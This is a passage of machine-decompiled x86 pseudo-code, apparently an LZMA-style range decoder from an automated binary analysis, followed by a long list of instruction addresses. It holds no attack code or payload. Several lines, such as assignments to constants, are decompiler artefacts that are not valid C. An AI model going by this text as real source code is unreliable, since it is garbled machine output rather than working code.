												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                    0x00000000
                                                                                                    0x004063d0
                                                                                                    0x004063d0
                                                                                                    0x004063d4
                                                                                                    0x004063f5
                                                                                                    0x004063fc
                                                                                                    0x00406402
                                                                                                    0x00406408
                                                                                                    0x0040641a
                                                                                                    0x00406420
                                                                                                    0x00406425
                                                                                                    0x00000000
                                                                                                    0x004063d6
                                                                                                    0x004063dc
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067ec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067ee
                                                                                                    0x004067f2
                                                                                                    0x004069a1
                                                                                                    0x004069b7
                                                                                                    0x004069bf
                                                                                                    0x004069c6
                                                                                                    0x004069c8
                                                                                                    0x004069cf
                                                                                                    0x004069d3
                                                                                                    0x004069d3
                                                                                                    0x004067fe
                                                                                                    0x00406805
                                                                                                    0x0040680d
                                                                                                    0x00406810
                                                                                                    0x00406813
                                                                                                    0x00406813
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x00000000
                                                                                                    0x00405fcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fd8
                                                                                                    0x00405fdb
                                                                                                    0x00405fde
                                                                                                    0x00405fe2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fe8
                                                                                                    0x00405feb
                                                                                                    0x00405fed
                                                                                                    0x00405fee
                                                                                                    0x00405ff1
                                                                                                    0x00405ff3
                                                                                                    0x00405ff4
                                                                                                    0x00405ff6
                                                                                                    0x00405ff9
                                                                                                    0x00405ffe
                                                                                                    0x00406003
                                                                                                    0x0040600c
                                                                                                    0x0040601f
                                                                                                    0x00406022
                                                                                                    0x0040602e
                                                                                                    0x00406056
                                                                                                    0x00406058
                                                                                                    0x00406066
                                                                                                    0x00406066
                                                                                                    0x0040606a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x0040605a
                                                                                                    0x0040605d
                                                                                                    0x0040605e
                                                                                                    0x0040605e
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x00406034
                                                                                                    0x00406039
                                                                                                    0x00406039
                                                                                                    0x00406042
                                                                                                    0x0040604a
                                                                                                    0x0040604d
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406070
                                                                                                    0x00406070
                                                                                                    0x00406074
                                                                                                    0x00406920
                                                                                                    0x00000000
                                                                                                    0x00406920
                                                                                                    0x0040607d
                                                                                                    0x0040608d
                                                                                                    0x00406090
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406096
                                                                                                    0x0040609a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040609c
                                                                                                    0x004060a2
                                                                                                    0x004060cc
                                                                                                    0x004060d2
                                                                                                    0x004060d9
                                                                                                    0x00000000
                                                                                                    0x004060d9
                                                                                                    0x004060a8
                                                                                                    0x004060ab
                                                                                                    0x004060b0
                                                                                                    0x004060b0
                                                                                                    0x004060bb
                                                                                                    0x004060c3
                                                                                                    0x004060c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040610b
                                                                                                    0x00406111
                                                                                                    0x00406114
                                                                                                    0x00406121
                                                                                                    0x00406129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004060e0
                                                                                                    0x004060e0
                                                                                                    0x004060e4
                                                                                                    0x0040692f
                                                                                                    0x00000000
                                                                                                    0x0040692f
                                                                                                    0x004060f0
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fe
                                                                                                    0x00406101
                                                                                                    0x00406104
                                                                                                    0x00406109
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067ec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406131
                                                                                                    0x00406133
                                                                                                    0x00406136
                                                                                                    0x004061a7
                                                                                                    0x004061aa
                                                                                                    0x004061ad
                                                                                                    0x004061b4
                                                                                                    0x004061be
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x00406138
                                                                                                    0x0040613c
                                                                                                    0x0040613f
                                                                                                    0x00406141
                                                                                                    0x00406144
                                                                                                    0x00406147
                                                                                                    0x00406149
                                                                                                    0x0040614c
                                                                                                    0x0040614e
                                                                                                    0x00406153
                                                                                                    0x00406156
                                                                                                    0x00406159
                                                                                                    0x0040615d
                                                                                                    0x00406164
                                                                                                    0x00406167
                                                                                                    0x0040616e
                                                                                                    0x00406172
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x0040617e
                                                                                                    0x00406181
                                                                                                    0x0040619f
                                                                                                    0x004061a1
                                                                                                    0x00000000
                                                                                                    0x00406183
                                                                                                    0x00406183
                                                                                                    0x00406186
                                                                                                    0x00406189
                                                                                                    0x0040618c
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x00406191
                                                                                                    0x00406194
                                                                                                    0x00406196
                                                                                                    0x00406197
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040643a
                                                                                                    0x0040643e
                                                                                                    0x00406461
                                                                                                    0x00406464
                                                                                                    0x00406467
                                                                                                    0x00406471
                                                                                                    0x00406440
                                                                                                    0x00406440
                                                                                                    0x00406443
                                                                                                    0x00406446
                                                                                                    0x00406449
                                                                                                    0x00406456
                                                                                                    0x00406459
                                                                                                    0x00406459
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040647d
                                                                                                    0x00406481
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406491
                                                                                                    0x00406493
                                                                                                    0x00406497
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
                                                                                                    0x00406535
                                                                                                    0x00406538
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406542
                                                                                                    0x00406547
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061ca
                                                                                                    0x004061ca
                                                                                                    0x004061ce
                                                                                                    0x0040693b
                                                                                                    0x00000000
                                                                                                    0x0040693b
                                                                                                    0x004061d4
                                                                                                    0x004061d7
                                                                                                    0x004061da
                                                                                                    0x004061de
                                                                                                    0x004061e1
                                                                                                    0x004061e7
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061ec
                                                                                                    0x004061ef
                                                                                                    0x004061ef
                                                                                                    0x004061f2
                                                                                                    0x004061f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061fb
                                                                                                    0x00406201
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406207
                                                                                                    0x00406207
                                                                                                    0x0040620b
                                                                                                    0x0040620e
                                                                                                    0x00406211
                                                                                                    0x00406214
                                                                                                    0x00406217
                                                                                                    0x00406218
                                                                                                    0x0040621b
                                                                                                    0x0040621d
                                                                                                    0x00406223
                                                                                                    0x00406226
                                                                                                    0x00406229
                                                                                                    0x0040622c
                                                                                                    0x0040622f
                                                                                                    0x00406232
                                                                                                    0x00406235
                                                                                                    0x00406251
                                                                                                    0x00406254
                                                                                                    0x00406257
                                                                                                    0x0040625a
                                                                                                    0x00406261
                                                                                                    0x00406265
                                                                                                    0x00406267
                                                                                                    0x0040626b
                                                                                                    0x00406237
                                                                                                    0x00406237
                                                                                                    0x0040623b
                                                                                                    0x00406243
                                                                                                    0x00406248
                                                                                                    0x0040624a
                                                                                                    0x0040624c
                                                                                                    0x0040624c
                                                                                                    0x0040626e
                                                                                                    0x00406275
                                                                                                    0x00406278
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x00406283
                                                                                                    0x00406283
                                                                                                    0x00406287
                                                                                                    0x00406947
                                                                                                    0x00000000
                                                                                                    0x00406947
                                                                                                    0x0040628d
                                                                                                    0x00406290
                                                                                                    0x00406293
                                                                                                    0x00406297
                                                                                                    0x0040629a
                                                                                                    0x004062a0
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a5
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
